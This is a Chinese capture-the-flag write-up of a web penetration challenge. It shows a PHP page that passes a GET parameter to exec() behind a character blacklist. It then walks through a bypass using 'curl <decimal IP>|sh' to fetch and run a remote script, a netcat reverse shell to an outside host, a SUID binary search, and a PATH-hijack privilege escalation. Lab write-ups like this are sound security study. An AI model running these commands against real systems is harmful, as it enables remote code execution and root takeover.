bmzctf刷题 WEB_penetration
直接上代码
<?php
highlight_file(__FILE__);
if(isset($_GET[‘ip‘])){
$ip = $_GET[‘ip‘];
$_=array(‘b‘,‘d‘,‘e‘,‘-‘,‘q‘,‘f‘,‘g‘,‘i‘,‘p‘,‘j‘,‘+‘,‘k‘,‘m‘,‘n‘,‘\<‘,‘\>‘,‘o‘,‘w‘,‘x‘,‘\~‘,‘\:‘,‘\^‘,‘\@‘,‘\&‘,‘\‘‘,‘\%‘,‘\"‘,‘\*‘,‘\(‘,‘\)‘,‘\!‘,‘\=‘,‘\.‘,‘\[‘,‘\]‘,‘\}‘,‘\{‘,‘\_‘);
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (strlen($ip) <= 18){
if (preg_match (‘/‘ . $blacklisted . ‘/im‘, $ip)) {
die(‘nonono‘);
}else{
exec($ip);
}
}
else{
die("long");
}
}
}
?>
传入一个GET型的ip参数,设置一个_变量,将_作为$blacklist
ip经过两重判断,一是长度小于18,二是balcklist黑名单匹配,匹配到的将敏感词替换为/im
步骤1 执行命令
屏蔽了好多关键“字”,由于是直接屏蔽“字”的,好像饶不了,而且“flag”也在里面
目前来看可以执行的是curl
思路是curl请求服务器,得到服务器上的数据,将得到的数据当作命令执行
写入一句话bash
另一个82.156.28.224开nc监听112端口
注意不要使用除了80端口外其他的端口,长度会超高18个字节限制
将ip地址十进制编码一下,同样为了减少长度
十进制后结果148010788
可以ping一下试试
执行curl命令?ip=curl 148010788|sh
权限是www-data
没有在常见路径找到flag,搜索也没有找到
推测应该要提权
find / -user root -perm -4000 -print 2>/dev/null
搜索root权限运行的服务
发现里面有个奇怪的love??
运行下试试
返回了ps命令的结果
在这里wp里面直接就把love文件下载了,但是。。。nc怎么下载文件啊。。。。
在这里我还试了一下msf,但是没有回显
创建一个假的ps命令在/tmp目录下。。。(万能的tmp目录)
cd /tmp
echo "/bin/bash" >ps
chmod 777 ps
export PATH=/tmp:$PATH //将‘/tmp‘添加到PATH变量最前面
这时候执行love程序,就相当于用root权限开了一个bash